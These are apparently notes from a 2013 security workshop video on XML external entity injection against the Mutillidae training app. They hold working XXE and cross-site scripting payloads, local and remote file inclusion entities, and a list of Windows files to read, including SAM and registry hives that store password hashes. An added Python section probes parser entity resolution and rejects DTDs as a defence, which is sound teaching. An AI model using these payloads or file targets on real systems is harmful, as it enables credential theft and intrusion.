Title: Video Tutorial: Introduction to XML External Entity Injection

Author: webpwnized

From: ISSA KY Sept 2013 Workshop (Louisville, KY)

Twitter: @webpwnized

This video introduces XML injection as the route to XML external entity injection (XXE) and XML-based cross-site scripting (XSS). The notes used or mentioned in the video are posted below the video.

1. What is XML injection

2. What is an "entity"

3. What is entity injection

4. Cross site scripting with entity injection

5. Determining local execution path

6. Determining privileges of "user"

7. Directory traversal

8. file:/// protocol

9. Local File Inclusion with entity injection

Firefox --> Burp-Suite --> Apache2 --> PHP App Server --> PHP Code --> XML Parser --> PHP --> Apache2 --> Burp-Suite --> Firefox

Basics

<?xml version="1.0"?><change-log><text>Hello World</text></change-log>

<?xml version="1.0"?><change-log><text>&quot;Hello World&quot;</text></change-log>

<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"> ]><change-log><text>Hello &myEntity;</text></change-log>

<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"><!ENTITY myQuote "&quot;"> ]><change-log><text>&myQuote;Hello &myEntity;&myQuote;</text></change-log>

Information Disclosure

C:\xampp\htdocs\mutillidae\xml-validator.php

file:///C:/xampp/htdocs/mutillidae/xml-validator.php

Try to cause various errors in order to coax information from the XML parser

Try to load files that don't exist

Put whitespace before the XML

Send malformed XML

Determine operating system type and the path at which interpretation is taking place

Cross site scripting

<?xml version="1.0"?><change-log><text><script>alert("FAIL")</script></text></change-log>

<?xml version="1.0"?><change-log><text>&lt;script&gt;alert(&quot;Hello World&quot;)&lt;/script&gt;</text></change-log>

Local File Inclusion

Try to acquire application configuration files and/or source code files

Try to acquire operating system files

<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY systemEntity SYSTEM "robots.txt"> ]><change-log><text>&systemEntity;</text></change-log>

Remote File Inclusion

<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY systemEntity SYSTEM "http://192.168.56.102/index.html"> ]><change-log><text>&systemEntity;</text></change-log>
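The check a defender wants after the Local and Remote File Inclusion payloads above: does a given parser configuration resolve SYSTEM entities at all, and what does a hardened intake look like. This is an added example in Python's standard-library SAX parser, not code from the video or Mutillidae. The probe writes a throwaway file containing a known marker and asks the parser to pull it in, so the result is conclusive without touching a real system file; feature_external_ges is the real stdlib switch, while the marker, temp file and function names are constructed for this example. The two payload strings are copies of the notes' samples and are only fed to the pre-parse guard, never to a parser.

```python
import io
import os
import re
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed copies of the two payloads from the notes (guard input only).
LFI_DOC = ('<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY systemEntity SYSTEM '
           '"robots.txt"> ]><change-log><text>&systemEntity;</text></change-log>')
RFI_DOC = ('<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY systemEntity SYSTEM '
           '"http://192.168.56.102/index.html"> ]><change-log><text>&systemEntity;</text>'
           '</change-log>')
PLAIN_DOC = '<?xml version="1.0"?><change-log><text>Hello World</text></change-log>'

CANARY = "XXE-CANARY-7f3a9c"  # constructed marker written to a throwaway file


class TextCollector(ContentHandler):
    """Gather every piece of character data that lands inside <text>."""

    def __init__(self):
        super().__init__()
        self._inside = False
        self._parts = []

    def startElement(self, name, attrs):
        if name == "text":
            self._inside = True

    def endElement(self, name):
        if name == "text":
            self._inside = False

    def characters(self, data):
        if self._inside:
            self._parts.append(data)

    @property
    def text(self) -> str:
        return "".join(self._parts)


def sax_text_of(doc: str, allow_external_entities: bool) -> str:
    """Parse with the stdlib SAX parser under an explicit external-entity setting.

    feature_external_ges is expat's switch for resolving general external
    entities (SYSTEM "..." declarations). It is off by default since Python
    3.7.1; setting it here makes the probe independent of that default.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, allow_external_entities)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(doc.encode("utf-8")))
    return collector.text


def external_entity_probe(allow_external_entities: bool) -> bool:
    """True if this parser setting pulled a local file into the document.

    A temporary file holding a known marker stands in for robots.txt from the
    notes. If the marker shows up inside <text>, untrusted documents must not
    reach a parser configured this way.
    """
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write(CANARY)
        path = fh.name
    try:
        doc = ('<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY systemEntity SYSTEM '
               '"%s"> ]><change-log><text>&systemEntity;</text></change-log>' % path)
        return CANARY in sax_text_of(doc, allow_external_entities)
    finally:
        os.unlink(path)


# XML keywords are case-sensitive, so a lowercase <!doctype is already a parse error.
DTD_MARKER = re.compile(r"<!(?:DOCTYPE|ENTITY)\b")


def contains_dtd(doc: str) -> bool:
    """Pre-parse guard: does the document carry a DOCTYPE or an entity declaration?"""
    return DTD_MARKER.search(doc) is not None


def accept_change_log(doc: str) -> str:
    """Intake for an application that never needs a DTD: refuse one outright.

    This closes the local file and relative-path case, the remote http:// case
    and entity-expansion denial of service in one place, before any parser
    setting gets a say.
    """
    if contains_dtd(doc):
        raise ValueError("DTD/DOCTYPE not permitted in change-log documents")
    return doc


if __name__ == "__main__":
    print("external entities off:", external_entity_probe(False))  # False
    print("external entities on: ", external_entity_probe(True))   # True
    for doc in (PLAIN_DOC, LFI_DOC, RFI_DOC):
        print("dtd present:", contains_dtd(doc))
```

Run the probe against the parser factory the application really uses (the PHP validator in the video would be exercised the same way, with a canary file on that host); a True result means the configuration, not the payload, is the finding. The DOCTYPE rejection is the simpler control when the format never legitimately carries a DTD, and it catches the remote variant without the parser ever opening a network connection.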

Windows XP SP3

  %WINDIR% = C:\WINDOWS

  %SYSTEMDRIVE% = C:

  %SYSTEMROOT% = C:\WINDOWS

Credit: Rob "Mubix" Fuller

  file:///C:\WINDOWS\System32\drivers\etc\hosts

  %WINDIR%\System32\drivers\etc\hosts

Blind Files

  %SYSTEMDRIVE%\boot.ini

  A file that can be counted on to be on virtually every Windows host. Helps with confirmation that a read is happening.

  %WINDIR%\win.ini

  This is another file to look for if boot.ini isn't there or coming back, which is sometimes the case.

  %SYSTEMROOT%\repair\SAM

  %SYSTEMROOT%\System32\config\RegBack\SAM

  It stores users' passwords in a hashed format (LM hash and NTLM hash). The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow Copy methods

  %SYSTEMROOT%\repair\system

  %SYSTEMROOT%\System32\config\RegBack\system

Files To Pull (if possible)

  %SYSTEMDRIVE%\pagefile.sys

  Large file, but contains spill over from RAM, usually lots of good information can be pulled, but should be a last resort due to size

  %WINDIR%\debug\NetSetup.log

  %WINDIR%\repair\sam

  %WINDIR%\repair\system

  %WINDIR%\repair\software

  %WINDIR%\repair\security

  %WINDIR%\iis6.log (5, 6 or 7)

  %WINDIR%\system32\logfiles\httperr\httperr1.log

  IIS 6 error log

  %SystemDrive%\inetpub\logs\LogFiles

  IIS 7's logs location

  %WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log (year month day)

  %WINDIR%\system32\config\AppEvent.Evt

  %WINDIR%\system32\config\SecEvent.Evt

  %WINDIR%\system32\config\default.sav

  %WINDIR%\system32\config\security.sav

  %WINDIR%\system32\config\software.sav

  %WINDIR%\system32\config\system.sav

  %WINDIR%\system32\CCM\logs\*.log

  %USERPROFILE%\ntuser.dat

  %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat

  %WINDIR%\System32\drivers\etc\hosts